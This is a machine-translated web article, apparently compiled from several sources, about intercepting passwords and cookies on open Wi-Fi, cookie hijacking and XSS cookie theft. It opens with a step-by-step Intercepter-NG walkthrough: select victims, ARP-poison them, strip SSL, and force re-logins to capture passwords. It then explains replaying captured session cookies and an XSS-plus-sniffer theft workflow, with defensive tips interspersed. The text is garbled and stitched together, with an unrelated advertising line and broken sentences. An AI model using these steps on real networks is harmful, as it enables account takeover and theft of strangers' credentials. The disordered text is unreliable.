About the dangers of open Wifi access points, about how passwords can be intercepted.
Today we’ll look at intercepting passwords over Wi-Fi and intercepting cookies over Wi-Fi using the program.
The attack will take place due to Sniffing.
Sniffing— sniff translates as “Sniff.” Sniffing allows you to analyze network activity on the Internet, view which sites the user visits and intercept passwords. But it can also be used for useful purposes, for listening to viruses that send any data to the Internet.
The method I will show is quite primitive and simple. In fact, you can use the program more strongly.
Official website of the program sniff.su (copy the link and open in a new tab), you can download it in the section "Download".
There is a version for Windows Unix systems and for android.
We will consider for Windows since this is the most popular system and the program here is the most advanced.
Your browser or antivirus may complain that the program is dangerous, but you yourself understand that this is a hack program, and it will always respond to such hacks.
The program is downloaded in a zip archive, you just need to unzip the program into a folder and use it, there is no need to install anything.
The program has the ability to organize various Mitm attacks on Wi-Fi networks.
The article is written purely for informational purposes, to show by example the dangers of open WiFi points You perform any specified actions at your own peril and risk. And I want to remind you about criminal liability for protecting other people’s data.
Service avi1 offers breathtakingly cheap prices for the opportunity to order subscribers to your Instagram profile. Achieve increased online popularity or sales right now, without spending a lot of effort and time.
Working with the Intercepter NG program
So, the program is launched via Intercepter-NG.exe.
The program has an English interface, but if you are a confident computer user, I think you will figure it out.
Below there will be a video on setting up (for those who prefer to watch rather than read).
— Select the desired network at the top if you have several of them.
— Switch the type Ethernet/WiFi, if you have Wi Fi, then you need to select the Wi FI icon (to the left of the network selection)
— Press the button Scan Mode(radar icon)
- Click in the empty field right click mouse and click on context menu Smart scan
— All connected devices to the network will appear
— Select the victim (you can select everyone while holding down the Shift key), just do not mark the router itself, its IP is usually 192.168.1.1
- Having selected, right-click and click Add to nat
- Go to the tab Nat
- IN Stealth ip It is advisable to change the last digit to any unoccupied one, this will hide your real IP.
- Put a tick on SSL Strip And SSL Mitm.
— Click Settings(gears on the right).
- Put a tick on Resurrection(This will allow you to intercept passwords and encrypted cookies HTTPS protocol) and Remove Spoof IP/Mac. You can check the box Cookie Killer, thanks to her, the victim will be kicked out of the current page, for example social network and the victim will have to re-enter the password, and we will intercept it. Compare the settings with the picture.
— Here the setup is complete, close the settings with a checkmark.
— The setup is complete, you can begin the attack.
— Press the button at the top Start/stop sniffing(triangle), in the same window click on the radiation icon at the bottom Start/Stop ARP Poison
— Go to the tab Password mode and right-click in the window and select Show Cookies(“This will allow cookies and passwords entered by victims to be shown”)
That's it, we're waiting for someone to enter the password.
Sometimes it happens that the Internet stops working, try to access the Internet yourself, if it doesn’t work, restart the program.
I noticed that it is not always possible to intercept a password, but in fact it works almost without failure.
That's all, we looked at intercepting passwords over Wi-Fi and intercepting cookies over Wi-Fi.
take care of yourself
The picture shows that the cookie contains the line wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. This value is in unencrypted form in the cookie and can be easily intercepted using the Achilles utility, but in most cases in Achilles you can only see the hash of a particular entry. Before sending the request to the server, you can try to replace this line with any similar one (although in in this case there is no point) - the number of attempts is not limited. Then, by sending this request to the server using the Send button, you can receive a response from the server intended for the administrator.
In the previous example, you can use direct user ID spoofing. In addition, the name of the parameter, replacing the value of which provides additional features hacker, can be the following: user (for example, USER=JDOE), any expression with an ID string (for example, USER=JDOE or SESSIONID=BLAHBLAH), admin (for example, ADMIN=TRUE), session (for example, SESSION=ACTIVE), cart (for example, CART=FULL), as well as expressions such as TRUE, FALSE, ACTIVE, INACTIVE. Typically format cookies very much depends on the application for which they are used. However, these tips for finding application flaws using cookies apply to almost all formats.
Client-side countermeasures against cookie extraction
IN general case Users should be wary of Web sites that use cookies for authentication and to store sensitive data. It is also necessary to remember that a Web site that uses cookies for authentication must support at least the SSL protocol to encrypt the username and password, since in the absence of this protocol, the data is transmitted unencrypted, which makes it possible to intercept it using the simplest software to view data being sent over the network.
Kookaburra Software has developed a tool to facilitate the use of cookies. The tool is called CookiePal ( http://www.kburra.com/cpal.html (see www.kburra.com)). This program is intended to warn the user when a Web site attempts to install a cookie on the machine, and the user can allow or deny this action. Similar cookie blocking functions are available in all browsers today.
Another reason for regularly installing Web browser updates is that security flaws in these programs are constantly being identified. So, Bennet Haselton and Jamie McCarthy created a script that, after clicking on a link, retrieves cookies from the client's machine. As a result, all the contents of the cookies that are on the user's machine become available.
This kind of hack can also be done using the handle
To ensure that such things do not threaten our personal data, I do this myself and advise everyone to always update software that works with HTML code (e-mail clients, media players, browsers, etc.).
Many people prefer to simply block cookies, but most Web sites require cookies to be browsed. Conclusion - if in the near future an innovative technology appears that allows you to do without cookies, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for a hacker! This is true, since a better alternative does not yet exist.
Server-side countermeasures
In case of recommendations for ensuring server security, experts give one simple piece of advice: do not use the cookie mechanism unless absolutely necessary! Particular care must be taken when using cookies that remain on the user's system after the end of the communication session.
Of course, it is important to understand that cookies can be used to provide security to Web servers for user authentication. If your application does need to use cookies, you should configure the cookie mechanism to use different short-lived keys for each session, and try not to put information in these files that could be used by hackers for hacking (such as ADMIN=TRUE).
Additionally, to make your use of cookies more secure, you can use cookie encryption to prevent sensitive information from being extracted. Of course, encryption does not solve all security problems when working with cookie technology, but this method will prevent the most simple hacks, described above.
Have you ever wondered how some Web sites personalize their visitors? This can be expressed, for example, in remembering the contents of the “cart” (if this node is intended for selling goods) or in the way of filling out the fields of some form. The HTTP protocol that underlies the functioning of the World Wide Web does not have the means to track events from one visit to a site to another, so a special add-on was developed to be able to store such “states”. This mechanism, described in RFC 2109, inserts special pieces of cookie data into HTTP requests and responses that allow Web sites to track their visitors.
Cookie data may be stored for the duration of the communication session ( per session), while remaining in random access memory during one session and being deleted when the browser is closed, or even after a specified period of time has elapsed. In other cases they are permanent ( persistent), remaining on the user's hard drive as text file. They are usually stored in the Cookies directory (%windir%\Cookies on Win9x and %userprofile%\Cookies on NT/2000). It is not difficult to guess that after capturing cookies on the Internet, an attacker can impersonate the user of this computer, or collect contained in these files important information. After reading the following sections, you will understand how easy it is to do.
Cookie interception
The most direct method is to intercept cookies as they are transmitted over the network. The intercepted data can then be used when logging into the appropriate server. This problem can be solved using any packet interception utility, but one of the best is Lavrenty Nikula’s program ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet includes two utilities that work together. Program CaptureNet captures the packet itself and stores it on disk, and the PeepNet utility opens the file and converts it into a human-readable format. The following example is a fragment of a communication session reconstructed by PeepNet, during which the cookie serves to authenticate and control access to the pages viewed (names have been changed to maintain anonymity).
GET http://www.victim.net/images/logo.gif HTTP/1.0 Accept: */* Referrer: http://www.victim.net/ Host: www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah
The example above shows a cookie fragment placed in an HTTP request coming to the server. The most important is the field cuid=, which specifies unique identificator, used for user authentication on the www.victim.net node. Let's say that after this the attacker visited the victim.net node, received his own identifier and a cookie (it is assumed that the node does not place the cookie data in virtual memory, but writes it to HDD). The attacker can then open his own cookie and replace the cuid= field ID with it from the captured packet. In this case, when logging into the victim.net server, he will be perceived as the user whose cookie data was intercepted.
Program ability PeepNet replaying the entire communication session or its fragment greatly facilitates the implementation of attacks of this type. Using a button Go get it! You can re-fetch the pages a user viewed using their cookie data previously captured by CaptureNet. In the PeepNet utility dialog box you can see information about someone’s completed orders. This uses cookie data intercepted by CaptureNet for authentication. Note the frame located in the lower right corner of the session data dialog box and the line that follows the Cookie: line. This is the cookie data used for authentication.
It's a pretty neat trick. In addition, the utility CaptureNet can provide a complete decrypted record of traffic, which is almost equivalent to the capabilities of professional-grade utilities such as Network Associates, Inc.'s Sniffer Pro. However, the utility SpyNet Even better - you can get it for free!
Countermeasures
You should be wary of sites that use cookies for authentication and storing sensitive identification information. One tool that can help with security is Kookaburra Software's Cookie Pal, which can be found at http://www.kburra.com/cpal.html. This software You can configure it to generate warning messages for the user when a Web site attempts to use the cookie mechanism. In this case, you can "look behind the scenes" and decide whether these actions should be allowed. IN Internet Explorer There is a built-in cookie support mechanism. To enable it, launch the Internet Options applet in Control Panel, go to the Security tab, select the Internet Zone item, set the Custom Level mode, and for permanent and temporary cookie data, set the switch to Prompt. Setting up the use of cookies in the Netscape browser is done using the command Edit › Preferences › Advanced and setting the Warn me before accepting a cookie or Disable cookies mode (Fig. 16.3). When you accept a cookie, you need to check whether it is written to disk and see if the Web site collects information about users.
When visiting a site that uses cookies for authentication, you must ensure that the username and password you initially provide are at least SSL encrypted. Then this information will appear in the PeepNet program window, at least not in the form of plain text.
The authors would prefer to avoid cookies entirely if many frequently visited Web sites did not require this option. For example, for the worldwide popular Hotmail service Microsoft Cookies are required for registration. Because this service uses several different servers during the authentication process, adding them to the Trusted Sites zone is not that easy (this process is described in the section "Using Security Zones Wisely: A Common Solution to the Activex Control Problem"). In this case, the designation *.hotmail.com will help. Cookies are not a perfect solution to the problem of HTML protocol incompleteness, but alternative approaches seem to be even worse (for example, adding an identifier to the URL, which can be stored on proxy servers). Until a better idea comes along, your only option is to control your cookies using the methods listed above.
Capture cookies via URL
Let's imagine something terrible: Internet Explorer users click on specially crafted hyperlinks and become potential victims, risking their cookies being intercepted. Bennett Haselton ( Bennett Haselton) and Jamie McCarthy ( Jamie McCarthy) from the teen organization Peacefire, which advocates for freedom of communication via the Internet, published a script that brings this idea to life. This script retrieves cookies from client computer if its user clicks on a link contained on that page. As a result, the contents of the cookie become available to Web site operators.
This feature can be exploited for nefarious purposes by embedding IFRAME tags in the HTML of a Web page, HTML email, or newsgroup post. The following example, provided by security consultant Richard M. Smith, demonstrates the ability to use IFRAME handles with a utility developed by Peacefire.
You can make up an insidious electronic message, which would "grab" cookies from hard drive user and transmitted them to the operators of the peacefire.org node. To do this, you need to place a link to this node in it many times as shown in the example. Despite the fact that the guys from Peacefire seem like pretty nice people, it’s unlikely that anyone would be happy if they got their hands on confidential data.
Countermeasures
Install the updater, which can be found at http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. You can also use the program Cookie Pal or built-in Internet Explorer capabilities as described above.
Have you noticed that when you return to a site that you have already visited, the site recognizes you and opens with the settings that you applied last time? Yes, and quite often? This happens thanks to cookies that store information about visitors such as login, password, session ID and other variables required to identify the visitor and display page content according to the user’s preferences chosen during the last visit to the resource. The WebCookiesSniffer program will show the user the cookies and their contents of the sites that the user is viewing in the browser.
View Cookies
You open a website and WebCookiesSniffer captures cookies in real time. The utility adds all caught cookies to a table that stores data about the host, request path, total length of the cookie file, the number of variables in the cookie file, and the Cookie itself with the names of the variables and values. WebCookiesSniffer can save the collected information about cookies to a text file. The program also has the ability to generate an HTML report for all or selected cookies. For the program to work, you must install the WinPcap driver (located in the archive along with WebCookiesSniffer). To change the language of the WebCookiesSniffer program to Russian, copy the file WebCookiesSniffer_lng.ini (also included in the archive) to the directory with the utility.
Screenshots of the WebCookiesSniffer program
|
|
Cookies - information in the form of a text file saved on the user’s computer by the website. Contains authentication data (login/password, ID, phone number, address mailbox), custom settings, access status. Stored in the browser profile.
Cookie hacking is the theft (or “hijacking”) of a web resource visitor’s session. Private information becomes available not only to the sender and recipient, but also to a third party - the person who carried out the interception.
Cookie Hacking Tools and Techniques
Computer thieves, like their colleagues in real life, in addition to skills, dexterity and knowledge, of course, also have their own tools - a kind of arsenal of master keys and probes. Let's take a look at the most popular tricks hackers use to extract cookies from Internet users.
Sniffers
Special programs to monitor and analyze network traffic. Their name comes from the English verb “sniff” (sniff), because. literally “sniff out” transmitted packets between nodes.
But attackers use a sniffer to intercept session data, messages, and other confidential information. The targets of their attacks are mainly unprotected networks, where cookies are sent in an open HTTP session, that is, they are practically not encrypted. (Public Wi-Fi is the most vulnerable in this regard.)
To embed a sniffer into the Internet channel between the user node and the web server, the following methods are used:
- “listening” to network interfaces (hubs, switches);
- branching and copying traffic;
- connecting to a network channel gap;
- analysis through special attacks that redirect the victim’s traffic to the sniffer (MAC-spoofing, IP-spoofing).
The abbreviation XSS stands for Cross Site Scripting cross-site scripting. Used to attack websites in order to steal user data.
The principle of XSS is as follows:
- an attacker inserts malicious code (a special disguised script) into a web page of a website, forum, or into a message (for example, when corresponding on a social network);
- the victim goes to the infected page and activates the installed code on his PC (clicks, follows a link, etc.);
- in turn, the executed malicious code “extracts” the user’s confidential data from the browser (in particular, cookies) and sends it to the attacker’s web server.
In order to “implant” a software XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.
All XSS vulnerabilities are divided into two types:
- Passive. The attack is obtained by requesting a specific script on a web page. Malicious code can be injected into various forms on a web page (for example, into a site's search bar). The most susceptible to passive XSS are resources that do not filter HTML tags when data arrives;
- Active. Located directly on the server. And they are activated in the victim’s browser. They are actively used by scammers in all kinds of blogs, chats and news feeds.
Hackers carefully “camouflage” their XSS scripts so that the victim does not suspect anything. They change the file extension, pass off the code as an image, motivate to follow the link, attract interesting content. As a result: a PC user, unable to control his own curiosity, with his own hand (with a mouse click) sends session cookies (with login and password!) to the author of the XSS script - the computer villain.
Cookie substitution
All cookies are saved and sent to the web server (from which they “came”) without any changes - in their original form - with the same values, strings and other data. Deliberate modification of their parameters is called cookie substitution. In other words, when replacing cookies, the attacker pretends to be wishful thinking. For example, when making a payment in an online store, the cookie changes the payment amount downwards - thus, “saving” on purchases occurs.
Stolen session cookies on a social network from someone else’s account are “inserted” into another session and on another PC. The owner of the stolen cookies gets full access to the victim's account (correspondence, content, page settings) as long as she is on her page.
“Editing” cookies is carried out using:
- "Manage cookies..." function in Opera browser;
- Cookies Manager and Advanced Cookie Manager addons for FireFox;
- IECookiesView utilities (Internet Explorer only);
- text editor like AkelPad, NotePad or Windows Notepad.
Physical access to data
Very simple circuit implementation consists of several steps. But it is effective only if the victim’s computer with an open session, for example VKontakte, is left unattended (and for a long time!):
- IN address bar browser is entered javascript function, displaying all saved cookies.
- After pressing “ENTER” they all appear on the page.
- Cookies are copied, saved to a file, and then transferred to a flash drive.
- On another PC, cookies are replaced in a new session.
- Access to the victim's account is granted.
As a rule, hackers use the above tools (+ others) both in combination (since the level of protection on many web resources is quite high) and separately (when users are excessively naive).
XSS + sniffer
- An XSS script is created, which specifies the address of an online sniffer (either home-made or a specific service).
- The malicious code is saved with the extension .img (image format).
- This file is then uploaded to a website page, chat, or personal message - where the attack will be carried out.
- The user's attention is drawn to the created “trap” (this is where social engineering comes into force).
- If the trap is triggered, the cookies from the victim's browser are intercepted by the sniffer.
- The attacker opens the sniffer logs and retrieves the stolen cookies.
- Next, it performs a substitution to obtain the rights of the account owner using the above tools.
Protecting cookies from hacking
- Use an encrypted connection (using appropriate protocols and security methods).
- Do not respond to dubious links, pictures, or tempting offers to familiarize yourself with “new free software.” Especially from strangers.
- Use only trusted web resources.
- End the authorized session by clicking the “Logout” button (not just closing the tab!). Especially if the account was not logged in with personal computer, and, for example, from a PC in an Internet cafe.
- Do not use the browser's "Save Password" feature. Stored registration data increases the risk of theft significantly. Don't be lazy, don't waste a few minutes of time entering your password and login at the beginning of each session.
- After web surfing - visiting social networks, forums, chats, websites - delete saved cookies and clear the browser cache.
- Regularly update browsers and antivirus software.
- Use browser extensions that protect against XSS attacks (for example, NoScript for FF and Google Chrome).
- Periodically in accounts.
And most importantly, do not lose vigilance and attention while relaxing or working on the Internet!